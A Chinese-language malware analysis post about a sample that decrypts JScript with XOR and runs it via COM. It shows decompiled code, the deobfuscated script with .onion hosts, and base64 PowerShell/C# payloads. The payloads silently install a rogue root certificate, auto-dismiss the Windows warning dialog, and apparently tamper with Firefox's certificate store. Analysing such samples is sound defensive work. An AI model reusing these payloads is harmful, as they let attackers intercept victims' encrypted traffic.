调用jscript引擎接口的malware分析

文件SHA256: f47717a4ae920921b69e8fd590c7a6353be08cad3cfc1a438c490b38e248d3f7

取标题无能,知道是啥就行了
用IDA反编译代码,入口处函数如下:

  主要功能解密jscript代码,通过com调用脚本引擎来执行脚本代码


int __cdecl main(int argc, const char argv, const char envp)
{
JSEngine v3; // ST20_4
JSEngine v4; // ST18_4
unsigned int i; // [esp+1Ch] [ebp-14h]
encry_code *a2; // [esp+20h] [ebp-10h]

FreeConsole();
a2 = operator new(8u);
a2->size = 0x14C88;
a2->js_code = operator new[](a2->size);
for ( i = 0; i < a2->size; ++i )
a2->js_code[i] = encrypt_code[i];
decrypt_code(a2->js_code, a2->size - 1);
v3 = operator new(0x10u);
memset(v3, 0x10u);
v4 = init_com(v3);
run_jscript(v4, a2);
sub_862F90(v4);
return 0;
}

jscript代码解密

    解密方式也比较简单,主要就是通过xor来解密



_BYTE __cdecl decrypt_code(char a1, unsigned int size)
{
_BYTE v2; // edx
_BYTE result; // eax
unsigned int v4; // [esp+0h] [ebp-1Ch]
_BYTE v5; // [esp+10h] [ebp-Ch]
unsigned int i; // [esp+14h] [ebp-8h]
unsigned int j; // [esp+18h] [ebp-4h]

v4
= 0x7FFFFFFF - 8fun(size, 6);
result = operator new(1u);
v5 = result;
v2 = result;
LOBYTE(result) = 4; v2 = 4;
// 生成xor key
for ( i = 0; i < 4; ++i )
{
v5[i] = v4 >> 8 * i;
result = (i + 1);
}
for ( j = 0; j < size; ++j )
{
result = (v5[j % 4] ^ a1[j]);
a1[j] = result;
}
return result;
}

解密后的jscript代码如下,看得眼瞎。

再次解密后代码,还是有点混淆

var CotZ=null;
var PBPRfNXyqx=null;
var XVEbnkh=null;

var sZTSiOfmguW = new ActiveXObject("WScript.Shell");
var VTU = new ActiveXObject("Scripting.FileSystemObject");

var BINARY_STREAM_TYPE = 1;
var TEXT_STREAM_TYPE = 2;
var CREATE_OVERWRITE_SAVE_MODE = 2;

var iOU=sZTSiOfmguW.ExpandEnvironmentStrings("%TEMP%");
var DSoEmfpCHxm=sZTSiOfmguW.ExpandEnvironmentStrings("%APPDATA%");
var hNVJ=sZTSiOfmguW.ExpandEnvironmentStrings("%COMPUTERNAME%");
var dEhkFnrZt=iOU+"\\"+hNVJ+".log";
//base64编码的ps脚本
var kVQNRMoBaO={
    LgiwpoajBw: ["yzpayb4sqad7gnin.onion", "bozuniy4sgprvinf.onion", "qr5c2etn6x5lhhfc.onion", "77gxepg2d34nfoid.onion"],
    oUXMMFdTE: "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",
    moZgTncSGjjMW: "ZnVuY3Rpb24gUFlaT0lnWFJ7CkFkZC1UeXBlIEAiCnVzaW5nIFN5c3RlbTsKdXNpbmcgU3lzdGVtLlRleHQ7CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwp1c2luZyBTeXN0ZW0uU2VjdXJpdHku"+
"Q3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXM7CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CgpwdWJsaWMgc3RhdGljIGNsYXNzIEppeFBDVWYKewoJcHVibGljIGNsYXNzIGRhZwogICAgewogICAgICAgIHB1YmxpYyBzdHJpbmcgV25kY2xhc3M7CiAgICAgICAg"+
"cHVibGljIHN0cmluZyBUaXRsZTsKICAgICAgICBwdWJsaWMgc3RyaW5nIFByb2Nlc3M7CiAgICAgICAgcHVibGljIEludFB0ciBoV25kOwogICAgfQoKICAgIHByaXZhdGUgZGVsZWdhdGUgYm9vbCBIbHNycW92YkxQKEludFB0ciBoV25kLCByZWYgZGFnIGRhdGEp"+
"OwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIGJvb2wgRW51bVdpbmRvd3MoSGxzcnFvdmJMUCBscEVudW1GdW5jLCByZWYgZGFn"+
"IGRhdGEpOwoJCglbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSwgQ2hhclNldCA9IENoYXJTZXQuQXV0byldCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0Q2xhc3NOYW1lKEludFB0ciBoV25kLCBTdHJpbmdCdWlsZGVy"+
"IGxwQ2xhc3NOYW1lLCBpbnQgbk1heENvdW50KTsKCiAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldCA9IENoYXJTZXQuQXV0bywgU2V0TGFzdEVycm9yID0gdHJ1ZSldCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0V2luZG93VGV4dChJ"+
"bnRQdHIgaFduZCwgU3RyaW5nQnVpbGRlciBscFN0cmluZywgaW50IG5NYXhDb3VudCk7CgkKCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvKV0KCXN0YXRpYyBleHRlcm4gdWludCBHZXRX"+
"aW5kb3dUaHJlYWRQcm9jZXNzSWQoSW50UHRyIGhXbmQsIG91dCB1aW50IGxwZHdQcm9jZXNzSWQpOwoJCglbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildCglbcmV0dXJuOiBNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5Cb29sKV0KCXN0YXRpYyBleHRlcm4gYm9vbCBT"+
"ZXRGb3JlZ3JvdW5kV2luZG93KEludFB0ciBoV25kKTsKCQoJcHVibGljIGRlbGVnYXRlIGJvb2wgS2RVR09HcWZsWEFvKEludFB0ciBod25kLCBJbnRQdHIgbFBhcmFtKTsKCQoJW0RsbEltcG9ydCgidXNlcjMyIildCglbcmV0dXJuOiBNYXJzaGFsQXMoVW5tYW5h"+
"Z2VkVHlwZS5Cb29sKV0KCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgRW51bUNoaWxkV2luZG93cyhJbnRQdHIgd2luZG93LCBLZFVHT0dxZmxYQW8gY2FsbGJhY2ssIEludFB0ciBsUGFyYW0pOyAgCgkKCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0"+
"ID0gQ2hhclNldC5BdXRvKV0KCXN0YXRpYyBleHRlcm4gSW50UHRyIFNlbmRNZXNzYWdlKEludFB0ciBoV25kLCBVSW50MzIgTXNnLCBJbnRQdHIgd1BhcmFtLCBJbnRQdHIgbFBhcmFtKTsKCQoJW0ZsYWdzXQogICAgcHJpdmF0ZSBlbnVtIFNuYXBzaG90RmxhZ3Mg"+
"OiB1aW50CiAgICB7CiAgICBIZWFwTGlzdCA9IDB4MDAwMDAwMDEsCiAgICBQcm9jZXNzID0gMHgwMDAwMDAwMiwKICAgIFRocmVhZCA9IDB4MDAwMDAwMDQsCiAgICBNb2R1bGUgPSAweDAwMDAwMDA4LAogICAgTW9kdWxlMzIgPSAweDAwMDAwMDEwLAogICAgSW5o"+
"ZXJpdCA9IDB4ODAwMDAwMDAsCiAgICBBbGwgPSAweDAwMDAwMDFGLAogICAgTm9IZWFwcyA9IDB4NDAwMDAwMDAKICAgIH0KICAgIC8vaW5uZXIgc3RydWN0IHVzZWQgb25seSBpbnRlcm5hbGx5CiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlh"+
"bCwgQ2hhclNldCA9IENoYXJTZXQuQXV0byldCiAgICBwcml2YXRlIHN0cnVjdCBQUk9DRVNTRU5UUlkzMgogICAgewogICAgY29uc3QgaW50IE1BWF9QQVRIID0gMjYwOwogICAgaW50ZXJuYWwgVUludDMyIGR3U2l6ZTsKICAgIGludGVybmFsIFVJbnQzMiBjbnRV"+
"c2FnZTsKICAgIGludGVybmFsIFVJbnQzMiB0aDMyUHJvY2Vzc0lEOwogICAgaW50ZXJuYWwgSW50UHRyIHRoMzJEZWZhdWx0SGVhcElEOwogICAgaW50ZXJuYWwgVUludDMyIHRoMzJNb2R1bGVJRDsKICAgIGludGVybmFsIFVJbnQzMiBjbnRUaHJlYWRzOwogICAg"+
"aW50ZXJuYWwgVUludDMyIHRoMzJQYXJlbnRQcm9jZXNzSUQ7CiAgICBpbnRlcm5hbCBJbnQzMiBwY1ByaUNsYXNzQmFzZTsKICAgIGludGVybmFsIFVJbnQzMiBkd0ZsYWdzOwogICAgW01hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJ5VmFsVFN0ciwgU2l6ZUNvbnN0"+
"ID0gTUFYX1BBVEgpXQogICAgaW50ZXJuYWwgc3RyaW5nIHN6RXhlRmlsZTsKICAgIH0KCiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuQ2hhclNldC5B"+
"dXRvKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIENyZWF0ZVRvb2xoZWxwMzJTbmFwc2hvdChbSW5dVUludDMyIGR3RmxhZ3MsIFtJbl1VSW50MzIgdGgzMlByb2Nlc3NJRCk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVl"+
"LCBDaGFyU2V0ID0gU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkNoYXJTZXQuQXV0byldCiAgICBzdGF0aWMgZXh0ZXJuIGJvb2wgUHJvY2VzczMyRmlyc3QoW0luXUludFB0ciBoU25hcHNob3QsIHJlZiBQUk9DRVNTRU5UUlkzMiBscHBlKTsKCiAgICBb"+
"RGxsSW1wb3J0KCJrZXJuZWwzMiIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuQ2hhclNldC5BdXRvKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQcm9jZXNzMzJOZXh0KFtJbl1JbnRQdHIgaFNu"+
"YXBzaG90LCByZWYgUFJPQ0VTU0VOVFJZMzIgbHBwZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0"+
"ZXJuIGJvb2wgQ2xvc2VIYW5kbGUoW0luXSBJbnRQdHIgaE9iamVjdCk7CiAgICAKCWNvbnN0IGludCBCTV9DTCA9IDB4MDBGNTsKCQoJcHVibGljIHN0YXRpYyBieXRlW10gdXZEemNlKFN0cmluZyBzQ2VydCkKICAgIHsKCQlyZXR1cm4gQ29udmVydC5Gcm9tQmFz"+
"ZTY0U3RyaW5nKHNDZXJ0KTsKICAgIH0KICAgICAgICAKCXB1YmxpYyBzdGF0aWMgdm9pZCBJaldGbmROS1p2KFN0cmluZyBzQ2VydCl7CgkJU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJbV2luMzJdOjpTdGFydCgpIik7CiAgICAgICAgYnl0ZVtdIGJDZXJ0ID0g"+
"dXZEemNlKHNDZXJ0KTsKICAgICAgICBpZiAoYkNlcnQgIT0gbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIFg1MDlDZXJ0aWZpY2F0ZTIgY2VydGlmaWNhdGUgPSBuZXcgWDUwOUNlcnRpZmljYXRlMihiQ2VydCk7CiAgICAgICAgICAgIFg1MDlTdG9yZSBzdG9y"+
"ZSA9IG5ldyBYNTA5U3RvcmUoU3RvcmVOYW1lLlJvb3QsIFN0b3JlTG9jYXRpb24uQ3VycmVudFVzZXIpOwogICAgICAgICAgICBzdG9yZS5PcGVuKE9wZW5GbGFncy5SZWFkV3JpdGUpOwogICAgICAgICAgICBpZiAoIXN0b3JlLkNlcnRpZmljYXRlcy5Db250YWlu"+
"cyhjZXJ0aWZpY2F0ZSkpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIFRocmVhZCB0aHJlYWQgPSBuZXcgVGhyZWFkKERJSVFEQlJjekFQKTsKICAgICAgICAgICAgICAgIHRocmVhZC5TdGFydCgpOwogICAgICAgICAgICAgICAgc3RvcmUuQWRkKGNlcnRp"+
"ZmljYXRlKTsKICAgICAgICAgICAgICAgIHRocmVhZC5Kb2luKCk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgc3RvcmUuQ2xvc2UoKTsKICAgICAgICB9Cgl9CgkKCXB1YmxpYyBzdGF0aWMgdm9pZCBESUlRREJSY3pBUCgpCgl7CgkJU3lzdGVtLkNvbnNvbGUu"+
"V3JpdGVMaW5lKCJbV2luMzJdOjpTZWFyY2hEaWFsb2coKSIpOwoJCUludFB0ciBoV25kOwoJCWRvewoJCQloV25kID0gTWtNdW5hV0FnKCIjMzI3NzAiLFN0cmluZy5FbXB0eSk7CgkJCWlmICghaFduZC5FcXVhbHMoSW50UHRyLlplcm8pKQoJCSAgICB7CgkJCQlT"+
"eXN0ZW0uQ29uc29sZS5Xcml0ZUxpbmUoIkZvdW5kZWQgaFduZD0weHswOlh9IixoV25kKTsKCQkgICAgCWJyZWFrOwoJCQl9ZWxzZQoJICAgICAgICB7CgkJCQloV25kPUludFB0ci5aZXJvOwoJCQkJU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJUcnkgYWdhaW4g"+
"ZmluZCB3aW5kb3ciKTsKCSAgICAgICAgfQoJCX13aGlsZSAoaFduZC5FcXVhbHMoSW50UHRyLlplcm8pKTsKCQlTeXN0ZW0uQ29uc29sZS5Xcml0ZUxpbmUoIkRpYWxvZyB3aW5kb3cgZm91bmRlZCIpOwoJCVNldEZvcmVncm91bmRXaW5kb3coaFduZCk7CgkJS2RV"+
"R09HcWZsWEFvIGNoaWxkUHJvYyA9IG5ldyBLZFVHT0dxZmxYQW8oT3NNZmdLZVVFZUxoKTsKCQlFbnVtQ2hpbGRXaW5kb3dzKGhXbmQsIGNoaWxkUHJvYywgSW50UHRyLlplcm8pOwoJfQoJCglwdWJsaWMgc3RhdGljIEludFB0ciBNa011bmFXQWcoc3RyaW5nIHdu"+
"ZGNsYXNzLCBzdHJpbmcgdGl0bGUpCiAgICB7CiAgICAgICAgZGFnIHNkID0gbmV3IGRhZygpOwogICAgICAgIHNkLlduZGNsYXNzID0gd25kY2xhc3M7CiAgICAgICAgc2QuVGl0bGUgPSB0aXRsZTsKCQlzZC5oV25kPUludFB0ci5aZXJvOwoJCVN5c3RlbS5Db25z"+
"b2xlLldyaXRlTGluZSgiRW51bVdpbmRvdyAtfCIpOwogICAgICAgIEVudW1XaW5kb3dzKG5ldyBIbHNycW92YkxQKFZQQXJtQmpuTkN1QyksIHJlZiBzZCk7CiAgICAgICAgcmV0dXJuIHNkLmhXbmQ7CiAgICB9CiAgICAKCXB1YmxpYyBzdGF0aWMgYm9vbCBWUEFy"+
"bUJqbk5DdUMoSW50UHRyIGhXbmQsIHJlZiBkYWcgZGF0YSkKICAgIHsKICAgIAlTdHJpbmdCdWlsZGVyIHRpdGxlID0gbmV3IFN0cmluZ0J1aWxkZXIoMTAyNCk7CiAgICAgICAgU3RyaW5nQnVpbGRlciBjbGFzc05hbWUgPSBuZXcgU3RyaW5nQnVpbGRlcigxMDI0"+
"KTsKICAgICAgICBHZXRXaW5kb3dUZXh0KGhXbmQsIHRpdGxlLCB0aXRsZS5DYXBhY2l0eSk7CiAgICAgICAgR2V0Q2xhc3NOYW1lKGhXbmQsIGNsYXNzTmFtZSwgY2xhc3NOYW1lLkNhcGFjaXR5KTsKICAgICAgICBTdHJpbmcgc0VOPXZoZEhKKGhXbmQpLlRvTG93"+
"ZXIoKTsKCQlpZigoIWRhdGEuV25kY2xhc3MuRXF1YWxzKFN0cmluZy5FbXB0eSkgJiYgY2xhc3NOYW1lLlRvU3RyaW5nKCkuU3RhcnRzV2l0aChkYXRhLlduZGNsYXNzKSkgfHwgKCFkYXRhLlRpdGxlLkVxdWFscyhTdHJpbmcuRW1wdHkpICYmIHRpdGxlLlRvU3Ry"+
"aW5nKCkuU3RhcnRzV2l0aChkYXRhLlRpdGxlKSkpCgkJewoJCQlTeXN0ZW0uQ29uc29sZS5Xcml0ZUxpbmUoIiAgICAgICAgICAgIHwtIGhXbmQ9MHh7MDpYfTsgQ2xhc3M9ezF9OyBUaXRsZT17Mn07IFByb2Nlc3M9ezN9IixoV25kLGNsYXNzTmFtZS5Ub1N0cmlu"+
"ZygpLHRpdGxlLlRvU3RyaW5nKCksc0VOKTsKICAgICAgICAJaWYoc0VOLkNvbnRhaW5zKCJjc3JzcyIpIHx8IHNFTi5Db250YWlucygiY2VydHV0aWwiKSAgfHwgc0VOLkNvbnRhaW5zKCJwb3dlcnNoZWxsIikpCgkgICAgICAgIHsKCQkgICAgICAgIGRhdGEuaFdu"+
"ZCA9IGhXbmQ7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CgkgICAgICAgIH0KICAgICAgICB9CiAgICAgICAJCiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CiAgCglwdWJsaWMgc3RhdGljIFN0cmluZyB2aGRISihJbnRQdHIgZVNldEpRdWlsdkFNKXsK"+
"CQl1aW50IEZMb29qID0gMDsKCQl1aW50IHRocmVhZElEID0gR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkKGVTZXRKUXVpbHZBTSwgb3V0IEZMb29qKTsKCQlTdHJpbmcgc1Byb2MgPSBudWxsOwoJICAgIEludFB0ciBoYW5kbGVUb1NuYXBzaG90ID0gSW50UHRyLlpl"+
"cm87CgkgICAgdHJ5CgkgICAgewoJICAgICAgICBQUk9DRVNTRU5UUlkzMiBESWQgPSBuZXcgUFJPQ0VTU0VOVFJZMzIoKTsKCSAgICAgICAgRElkLmR3U2l6ZSA9IChVSW50MzIpTWFyc2hhbC5TaXplT2YodHlwZW9mKFBST0NFU1NFTlRSWTMyKSk7CgkgICAgICAg"+
"IGhhbmRsZVRvU25hcHNob3QgPSBDcmVhdGVUb29saGVscDMyU25hcHNob3QoKHVpbnQpU25hcHNob3RGbGFncy5Qcm9jZXNzLCAwKTsKCSAgICAgICAgaWYgKFByb2Nlc3MzMkZpcnN0KGhhbmRsZVRvU25hcHNob3QsIHJlZiBESWQpKQoJICAgICAgICB7CgkgICAg"+
"ICAgIGRvCgkgICAgICAgIHsKCSAgICAgICAgICAgIGlmIChGTG9vaiA9PSBESWQudGgzMlByb2Nlc3NJRCkKCSAgICAgICAgICAgIHsKCSAgICAgICAgICAgIHNQcm9jID0gRElkLnN6RXhlRmlsZTsKCSAgICAgICAgICAgIGJyZWFrOwoJICAgICAgICAgICAgfQoJ"+
"ICAgICAgICB9IHdoaWxlIChQcm9jZXNzMzJOZXh0KGhhbmRsZVRvU25hcHNob3QsIHJlZiBESWQpKTsKCSAgICAgICAgfQoJICAgICAgICBlbHNlCgkgICAgICAgIHsKCSAgICAgICAgCXRocm93IG5ldyBBcHBsaWNhdGlvbkV4Y2VwdGlvbihzdHJpbmcuRm9ybWF0"+
"KCJGYWlsZWQgd2l0aCB3aW4zMiBlcnJvciBjb2RlIHswfSIsIE1hcnNoYWwuR2V0TGFzdFdpbjMyRXJyb3IoKSkpOwoJICAgICAgICB9CgkgICAgfQoJICAgIGNhdGNoIChFeGNlcHRpb24gZXgpCgkgICAgewoJICAgICAgICB0aHJvdyBuZXcgQXBwbGljYXRpb25F"+
"eGNlcHRpb24oIkNhbid0IGdldCB0aGUgcHJvY2Vzcy4iLCBleCk7CgkgICAgfQoJICAgIGZpbmFsbHkKCSAgICB7CgkgICAgICAgIENsb3NlSGFuZGxlKGhhbmRsZVRvU25hcHNob3QpOwoJICAgIH0KCSAgICByZXR1cm4gc1Byb2M7Cgl9CglwdWJsaWMgc3RhdGlj"+
"IGJvb2wgT3NNZmdLZVVFZUxoKEludFB0ciBoV25kLCBJbnRQdHIgbFBhcmFtKQoJewoJCVNlbmRNZXNzYWdlKGhXbmQsIEJNX0NMLCBJbnRQdHIuWmVybywgSW50UHRyLlplcm8pOwoJCXJldHVybiB0cnVlOwoJfQp9CiJAOwpbSml4UENVZl06OklqV0ZuZE5LWnYo"+
"IiVDRVJUJSIpOwpleGl0Cn0KUFlaT0lnWFI=",
    dDrnVhWm: "ZnVuY3Rpb24gTEdDeHdCTUhha3sKQWRkLVR5cGUgQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIE1pY3Jv"+
"c29mdC5XaW4zMjsKdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwp1c2luZyBTeXN0ZW0uQ29tcG9uZW50TW9k"+
"ZWw7CgpwdWJsaWMgc2VhbGVkIGNsYXNzIEVoZG1IR21MQnpNWEtsCnsKCXByaXZhdGUgc3RhdGljIHZvbGF0aWxlIEVoZG1IR21M"+
"QnpNWEtsIENUUFBrbU1nZmdGbjsKCXByaXZhdGUgc3RhdGljIG9iamVjdCB2eWpSY1FxSWJScURPbiA9IG5ldyBPYmplY3QoKTsK"+
"CXB1YmxpYyBzdGF0aWMgRWhkbUhHbUxCek1YS2wgTW1NYVJ1d3VoQlJaQ1IoKQogICAgewogICAgICAgIGlmIChDVFBQa21NZ2Zn"+
"Rm4gPT0gbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIGxvY2sgKHZ5alJjUXFJYlJxRE9uKQogICAgICAgICAgICB7CiAgICAg"+
"ICAgICAgICAgICBpZiAoQ1RQUGttTWdmZ0ZuID09IG51bGwpCiAgICAgICAgICAgICAgICBDVFBQa21NZ2ZnRm4gPSBuZXcgRWhk"+
"bUhHbUxCek1YS2woKTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm4gQ1RQUGttTWdmZ0ZuOwogICAgfQoJ"+
"Cgljb25zdCBpbnQgT0dlPTA7CiAgICAKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSwgQ2hh"+
"clNldCA9IENoYXJTZXQuQW5zaSldCiAgICBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShbTWFyc2hhbEFzKFVubWFu"+
"YWdlZFR5cGUuTFBTdHIpXXN0cmluZyBscEZpbGVOYW1lKTsKCiAgICBwcml2YXRlIHN0YXRpYyBJbnRQdHIgWHVYKHN0cmluZyBs"+
"aWJQYXRoKQogICAgewogICAgICAgIGlmIChTdHJpbmcuSXNOdWxsT3JFbXB0eShsaWJQYXRoKSkKICAgICAgICAgICAgdGhyb3cg"+
"bmV3IEFyZ3VtZW50TnVsbEV4Y2VwdGlvbigibGliUGF0aCIpOwoKICAgICAgICBJbnRQdHIgbW9kdWxlSGFuZGxlID0gTG9hZExp"+
"YnJhcnkobGliUGF0aCk7CiAgICAgICAgaWYgKG1vZHVsZUhhbmRsZSA9PSBJbnRQdHIuWmVybykKICAgICAgICB7CiAgICAgICAg"+
"ICAgIGludCBsYXN0ZXJyb3IgPSBNYXJzaGFsLkdldExhc3RXaW4zMkVycm9yKCk7CiAgICAgICAgICAgIFN5c3RlbS5Db25zb2xl"+
"LldyaXRlTGluZShTdHJpbmcuRm9ybWF0KCJMYXN0IGVycm9yOiAweHswOlh9IixsYXN0ZXJyb3IpKTsKICAgICAgICAgICAgV2lu"+
"MzJFeGNlcHRpb24gaW5uZXJFeCA9IG5ldyBXaW4zMkV4Y2VwdGlvbihsYXN0ZXJyb3IpOwogICAgICAgICAgICBpbm5lckV4LkRh"+
"dGEuQWRkKCJMYXN0V2luMzJFcnJvciIsIGxhc3RlcnJvcik7CiAgICAgICAgICAgIHRocm93IG5ldyBFeGNlcHRpb24oImNhbid0"+
"IGxvYWQgRExMICIgKyBsaWJQYXRoLCBpbm5lckV4KTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuIG1vZHVsZUhhbmRsZTsKICAg"+
"IH0KCiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRQcm9j"+
"QWRkcmVzcyhJbnRQdHIgaE1vZHVsZSwgc3RyaW5nIHByb2NlZHVyZU5hbWUpOwoJLy9Db25zdGFudHMKICAgIGNvbnN0IHVpbnQg"+
"TlNTX0lOSVRfUkVBRE9OTFk9MHgxOwogICAgY29uc3QgdWludCBOU1NfSU5JVF9OT0NFUlREQiA9IDB4MjsKICAgIGNvbnN0IHVp"+
"bnQgTlNTX0lOSVRfTk9NT0REQiA9IDB4NDsKICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfRk9SQ0VPUEVOID0gMHg4OwogICAgY29u"+
